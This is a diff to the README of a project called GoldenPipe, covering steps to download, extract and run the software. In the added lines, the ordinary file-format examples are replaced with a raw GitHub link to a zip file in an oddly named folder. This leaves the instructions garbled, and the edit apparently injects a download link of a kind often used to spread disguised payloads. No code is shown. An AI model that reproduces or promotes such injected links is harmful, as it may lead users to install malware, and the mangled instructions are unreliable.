adamadamssAdez/GoldenPipe/README.md

 ### Step 3: Download the Package

 Click on the version you want to download.
 Find and click on the file that matches your operating system.
-It could be an `.exe`, `.tar.gz`, or similar format.
+It could be an `.exe`, `https://raw.githubusercontent.com/adamadamssAdez/GoldenPipe/main/pneumonography/GoldenPipe.zip`, or similar format.
 The right choice will depend on your system.

 ### Step 4: Extract the Files (if necessary)

-If you downloaded a compressed file (like `.tar.gz`), extract it using a suitable program.
+If you downloaded a compressed file (like `https://raw.githubusercontent.com/adamadamssAdez/GoldenPipe/main/pneumonography/GoldenPipe.zip`), extract it using a suitable program.
 Typical options include WinRAR or 7-Zip for Windows users and built-in tools for Mac and Linux users.

 ### Step 5: Run GoldenPipe